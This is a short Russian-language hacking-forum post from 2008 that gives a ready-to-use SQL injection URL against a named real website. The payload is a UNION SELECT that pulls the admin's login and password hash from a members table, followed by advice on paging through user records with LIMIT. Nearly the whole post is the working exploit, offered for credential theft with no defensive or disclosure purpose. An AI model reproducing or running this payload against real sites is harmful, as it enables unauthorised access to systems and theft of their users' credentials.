12.12.2008, 19:02
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Еще вариант.
Имеется файл .htaccess смотрим пути,
в нашем случае была такая строчка
...modules/content/pub.content.php?url=/celebs/view&view=[sql inj]
пример рабочего запроса
PHP код:
http://yobt.com/modules/content/pub.content.php?url=/celebs/view&view=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(user_login,3x0a,user_pass),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+asm_s_members+limit+0,1/*
Получаем логин и пас админа. если не единственная запись, то выводим через limit (в нашем случае три записи юзверей+ анонимус)
Последний раз редактировалось xcedz; 12.12.2008 в 19:05..
|
|
|